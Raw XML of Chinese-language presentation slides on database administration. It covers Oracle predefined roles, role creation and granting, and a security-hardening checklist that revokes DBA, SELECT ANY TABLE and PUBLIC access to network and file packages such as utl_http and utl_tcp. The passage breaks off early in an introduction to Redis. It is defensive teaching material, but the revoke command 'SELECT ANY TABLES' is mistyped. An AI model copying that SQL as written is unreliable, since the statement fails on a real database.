              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>， </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>EXECUTE_CATALOG_ROLE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>， </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>SELECT_CATALOG_ROLE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>这些角色主要用于访问数据字典视图和包。</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角色管理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2911079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marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>．</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>EXP_FULL_DATABASE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>， </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>IMP_FULL_DATABASE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>这两个角色用于数据导入导出工具的使用。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>．</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>AQ_USER_ROLE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>， </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>AQ_ADMINISTRATOR_ROLE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>AQ:Advanced</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t> Query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>。这两个角色用于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>oracle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>高级查询功能。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>． </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>SNMPAGENT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>用于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>oracle enterprise manager</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>Intelligent Agent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>．</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>RECOVERY_CATALOG_OWNER</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>用于创建拥有恢复库的用户。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:latin typeface="宋体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>．</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>HS_ADMIN_ROLE</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角色管理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3259415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marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>建一个角色              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>&gt;create role role1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>授权给角色               </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>&gt;grant create any </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>table,create</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> procedure to role1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>授予角色给用户        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>&gt;grant role1 to user1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>4.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>查看角色所包含的权限       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>&gt;select * from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>role_sys_privs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>5.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>创建带有口令以角色</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>在生效带有口令的角色时必须提供口令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>&gt;create role role1 identified by password1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>6.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>修改角色：是否需要口令</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>&gt;alter role role1 not identified;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>&gt;alter role role1 identified by password1;</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角色管理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1007358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t>ORACRL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556792"/>
            <a:ext cx="10972800" cy="3849292"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>限制应用用户在数据库中的权限</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>SQL&gt;REVOKE SELECT ANY TABLES FROM &lt;USERNAM&gt;;(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>收回</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>select any tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>权限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>SQL&gt;REVOKE dba FROM &lt;USERNAM&gt;;(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>收回</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>dba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>角色</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>撤销</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>public</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>角色的程序包执行权限</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>SQL&gt;REVOKE execute ON </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>utl_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> FROM public;(Oracle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>官方建议撤销</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>public</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>角色对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>utl_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>utl_http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>utl_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>utl_smtp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>dbms_random</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>程序包的执行权限。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>修改系统帐户的默认口令（特别是管理员角色类帐户）锁定所有不需要的用户</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>SQL&gt;ALTER USER &lt;username&gt; ACCOUNT LOCK; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>严格限制库文件的访问权 限，保证除属主和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>外， 其他用户对库文件没有写 权限</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>chmod 640 $ORACLE_BASE/oradata/*</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a:t>Oracle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>相关安全配置</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1951728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Redis</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en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>Redis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>是一个开源的、使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>语言编写的、支持网络交互的、可基于内存也可持久化的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>Key-Value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>数据库。并提供多种语言的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>。其实</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>Redis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>本质上也是一种键值数据库的，它在包车键值数据库简单快捷特点的同时，也吸收了部分关系型数据库的优点。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>Redis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>不仅能保存</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>Strings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>类型的数据，还能保存</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>Lists</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>类型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>有序</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>Sets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>类型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>无序</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>的数据，而且还能完成排序</a:t>
            </a:r>
            <a:r>
